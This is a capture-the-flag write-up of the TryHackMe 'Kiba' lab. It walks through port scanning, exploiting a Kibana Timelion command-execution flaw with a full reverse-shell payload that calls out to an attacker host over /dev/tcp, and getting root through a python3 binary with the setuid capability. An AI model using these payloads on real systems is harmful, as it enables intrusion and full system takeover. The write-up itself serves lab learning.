Post

TryHackMe - Kiba

Posted Updated
By Nasrallah Baadi 4 min read

Description

Hello hackers, I hope you are doing well. We are doing Kiba from TryHackMe. The target is running a web application vulnerable to command execution which we use to get a reverse shell. Then we found a capability that we exploit to get root.

Enumeration

nmap

We start a nmap scan using the following command: sudo nmap -sC -sV -T4 {target_IP}.

  • -sC: run all the default scripts.

  • -sV: Find the version of services running on the target.

  • -T4: Aggressive scan to provide faster results.

1
2
3
4
5
6
7
8
9
10
11
12
13

Nmap scan report for 10.10.130.144
Host is up (0.17s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 9d:f8:d1:57:13:24:81:b6:18:5d:04:8e:d2:38:4f:90 (RSA)
|   256 e1:e6:7a:a1:a1:1c:be:03:d2:4e:27:1b:0d:0a:ec:b1 (ECDSA)
|_  256 2a:ba:e5:c5:fb:51:38:17:45:e7:b1:54:ca:a1:a3:fc (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We found two open ports, 22 running OpenSSH and 80 running an Apache web server.

Web

Let’s check the web site.

We found some ASCII art with the message Welcome, "linux capabilities" is very interesting..

Gobuster

Let’s run a directory scan.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27

===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.130.144/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              txt,php
[+] Timeout:                 10s
===============================================================
2022/10/07 05:38:14 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 278]
/.hta.txt             (Status: 403) [Size: 278]
/.hta.php             (Status: 403) [Size: 278]
/.htaccess            (Status: 403) [Size: 278]
/.htpasswd            (Status: 403) [Size: 278]
/.htaccess.txt        (Status: 403) [Size: 278]
/.htpasswd.txt        (Status: 403) [Size: 278]
/.htaccess.php        (Status: 403) [Size: 278]
/.htpasswd.php        (Status: 403) [Size: 278]
/index.html           (Status: 200) [Size: 1291]
/server-status        (Status: 403) [Size: 278] 
===============================================================

Couldn’t find anything useful.

Let’s scan all ports this time.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47

Nmap scan report for 10.10.134.123                                                                                                                           
Host is up (0.14s latency).                                                                                                                                  
Not shown: 9996 closed ports                                                                                                                                 
PORT     STATE SERVICE      VERSION                                                                                                                          
22/tcp   open  ssh          OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)                                                                     
| ssh-hostkey: 
|   2048 9d:f8:d1:57:13:24:81:b6:18:5d:04:8e:d2:38:4f:90 (RSA)            
|   256 e1:e6:7a:a1:a1:1c:be:03:d2:4e:27:1b:0d:0a:ec:b1 (ECDSA)           
|_  256 2a:ba:e5:c5:fb:51:38:17:45:e7:b1:54:ca:a1:a3:fc (ED25519)         
80/tcp   open  http         Apache httpd 2.4.18 ((Ubuntu))                
|_http-server-header: Apache/2.4.18 (Ubuntu)                              
|_http-title: Site doesn't have a title (text/html).  
5044/tcp open  lxi-evntsvc?                                                   
5601/tcp open  esmagent?                                                      
| fingerprint-strings:                                                                                                                                       
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessi
onReq, TLSSessionReq, TerminalServerCookie, X11Probe:                     
|     HTTP/1.1 400 Bad Request                                                
|   FourOhFourRequest:                                                        
|     HTTP/1.1 404 Not Found
|     kbn-name: kibana
|     kbn-xpack-sig: c4d007a8c4d04923283ef48ab54e3e6c
|     content-type: application/json; charset=utf-8
|     cache-control: no-cache
|     content-length: 60
|     connection: close
|     Date: Mon, 25 Oct 2021 15:08:48 GMT
|     {"statusCode":404,"error":"Not Found","message":"Not Found"}
|   GetRequest: 
|     HTTP/1.1 302 Found
|     location: /app/kibana
|     kbn-name: kibana
|     kbn-xpack-sig: c4d007a8c4d04923283ef48ab54e3e6c
|     cache-control: no-cache
|     content-length: 0
|     connection: close
|     Date: Mon, 25 Oct 2021 15:08:43 GMT
|   HTTPOptions: 
|     HTTP/1.1 404 Not Found
|     kbn-name: kibana
|     kbn-xpack-sig: c4d007a8c4d04923283ef48ab54e3e6c
|     content-type: application/json; charset=utf-8
|     cache-control: no-cache
|     content-length: 38
|     connection: close
|     Date: Mon, 25 Oct 2021 15:08:43 GMT

We found 2 other ports, let’s check port 5601 since it seems to run a web application.

This port is running Kibana which is a free and open user interface that lets you visualize your Elasticsearch data and navigate the Elastic Stack.

Navigating through the different tabs, we find the version number in the management tab.

Searching on google, we find that this version is vulnerable to command execution.

Foothold

On this github repository, we find an explanation on how to get a reverse shell using the following payload.

1
2

.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \'bash -i>& /dev/tcp/10.10.10.10/6666 0>&1\'");//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
  1. Go to Timelion tab.
  2. Past the payload into the Timelion visualizer.
  3. Click run
  4. Setup a listener.
  5. On the left panel click on Canvas

Privilege Escalation

Now let’s check the capabilities since we got a hint on the first web page about that. getcap -r / 2>/dev/null

1
2
3
4
5
6

kiba@ubuntu:/home/kiba/kibana/bin$ getcap -r / 2>/dev/null
getcap -r / 2>/dev/null
/home/kiba/.hackmeplease/python3 = cap_setuid+ep
/usr/bin/mtr = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep

We found a python3 binary with setuid capability, let’s check GTFOBins.

We need to run the following command for a root shell.

1

/home/kiba/.hackmeplease/python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'

Great! We got root.

Thank you for taking the time to read my write-up, I hope you have learned something from this. If you have any questions or comments, please feel free to reach out to me. See you in the next hack :).

References

https://gtfobins.github.io/gtfobins/python/#capabilities

https://github.com/mpgn/CVE-2019-7609

TryHackMe
tryhackme linux easy capability getcap rce cve python
This post is licensed under CC BY 4.0 by the author.